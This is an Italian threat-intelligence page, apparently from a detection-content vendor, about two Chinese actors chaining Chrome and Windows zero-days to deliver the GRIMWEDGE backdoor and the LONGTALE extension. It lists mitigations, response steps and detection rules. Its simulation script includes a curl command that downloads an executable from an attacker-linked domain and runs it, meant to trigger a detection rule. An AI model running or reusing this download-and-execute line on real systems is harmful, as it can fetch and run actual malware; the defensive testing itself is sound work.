SOC Prime Bias: Critical

10 Sep 2026 15:37 UTC

Attori di Minaccia Cinesi Concatenano Zero-Day di Browser e Windows

Author Photo
SOC Prime Team linkedin icon Segui
Attori di Minaccia Cinesi Concatenano Zero-Day di Browser e Windows
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riassunto

Due attori di minacce cinesi, UTA0560 e JungleBamboo, stanno utilizzando una sofisticata catena di exploit a più fasi che prende di mira Google Chrome e il kernel di Windows. Gli attacchi sfruttano una finestra di patch-gap in cui le vulnerabilità vengono risolte in Chromium prima che gli aggiornamenti corrispondenti raggiungano le versioni rilasciate di Google Chrome. Le esche di spear-phishing consegnano diversi payload, inclusi il backdoor JScript GRIMWEDGE e l’estensione Chrome LONGTALE.

Indagine

Il Network Security Monitoring di Volexity ha identificato una campagna di spear-phishing che prende di mira le ONG il 1 settembre 2026. L’indagine ha scoperto una catena di exploit condivisa che coinvolge CVE-2026-85046, CVE-2026-87491 e CVE-2026-85880. Gli analisti hanno separato l’attività in due cluster: UTA0560 che distribuisce GRIMWEDGE e JungleBamboo che utilizza SUPERSTOMP per installare l’estensione LONGTALE.

Mitigazione

Le organizzazioni dovrebbero mantenere Google Chrome aggiornato alla versione più recente disponibile per ridurre l’esposizione durante i periodi di patch-gap. I team di sicurezza dovrebbero monitorare comportamenti insoliti dei processi figlio di Chrome e installazioni non autorizzate di estensioni di Chrome. Si raccomanda anche un forte filtraggio delle email per le esche di spear-phishing e il monitoraggio per la creazione di compiti pianificati sospetti o non autorizzati.

Risposta

Se viene rilevata un’esploitazione, gli host interessati dovrebbero essere isolati immediatamente per prevenire ulteriori comunicazioni command-and-control o movimenti laterali. I risponditori dovrebbero effettuare la forensica della memoria sui processi di Chrome per identificare il codice iniettato. Le estensioni di Chrome installate dovrebbero essere anche verificate, e i compiti pianificati esaminati per voci sospette come Sistema di pianificazione di Windows.

Flusso d’attacco

Stiamo ancora aggiornando questa parte.

Rilevamenti

Uso sospetto di CURL (tramite cmdline)

Team SOC Prime
10 Set 2026

Command and Control sospetti tramite richiesta DNS di dominio di primo livello (TLD) insolito (via dns)

Team SOC Prime
10 Set 2026

Compito pianificato sospetto (tramite audit)

Team SOC Prime
10 Set 2026

IOC (HashSha256) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows

Regole AI SOC Prime
10 Set 2026

IOC (SourceIP) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows

Regole AI SOC Prime
10 Set 2026

IOC (DestinationIP) per rilevare: Attenti al (Patch) Gap: Molteplici attori di minacce cinesi concatenano exploit 0-day in Chrome & Windows

Regole AI SOC Prime
10 Set 2026

Pagine di atterraggio della catena di exploit di giorno zero di Chrome [Server web]

Regole AI SOC Prime
10 Set 2026

Rilevamento del backdoor JScript GRIMWEDGE e dell’attività di consegna del payload [Creazione processi di Windows]

Regole AI SOC Prime
10 Set 2026

Esecuzione della simulazione

  • Narrativa dell’attacco & Comandi: L’avversario cerca di stabilire un punto d’appoggio sul sistema compromesso distribuendo il backdoor JScript GRIMWEDGE. Per evitare il rilevamento da parte dell’AV basato su firme semplici, l’attaccante utilizza cmd.exe e l’utility nativa curl per scaricare un loader di seconda fase chiamato msgbox.exe da un’infrastruttura di command-and-control (C2) remota. Una volta completato il download, l’attaccante esegue immediatamente il payload dalla directory %TEMP% per minimizzare il tempo che il file trascorre sul disco e per utilizzare una directory spesso trascurata dal monitoraggio di base. Questa sequenza è progettata per corrispondere al pattern specifico della linea di comando che la regola di rilevamento sta cercando.

  • Script di test di regressione:

    # Script di simulazione per attivare la regola di rilevamento GRIMWEDGE.
    # Questo script crea un file fittizio per simulare il payload scaricato.
    
    $tempDir = $env:TEMP
    $payloadName = "msgbox.exe"
    $payloadPath = Join-Path $tempDir $payloadName
    
    # 1. Crea un 'msgbox.exe' fittizio per simulare il payload scaricato
    # In un attacco reale, questo sarebbe il vero binario malevolo.
    New-Item -Path $payloadPath -ItemType File -Force
    Set-Content -Path $payloadPath -Value "Contenuto del Payload Fittizio"
    
    # 2. Esegui la stringa di comando esatta identificata nella logica di rilevamento.
    # Nota: Usiamo un approccio locale di echo/mock per l'URL per garantire che la stringa di comando corrisponda esattamente.
    cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe"""
    
    Write-Host "Simulazione completata. Controllare SIEM per avvisi che corrispondono al pattern GRIMWEDGE."
  • Comandi per la pulizia:

    # Script di pulizia per rimuovere il payload simulato e i file.
    $tempDir = $env:TEMP
    $payloadPath = Join-Path $tempDir "msgbox.exe"
    
    if (Test-Path $payloadPath) {
        Remove-Item -Path $payloadPath -Force
        Write-Host "Pulizia riuscita: $payloadPath rimosso."
    } else {
        Write-Host "Payload non trovato. Pulizia non necessaria."
    }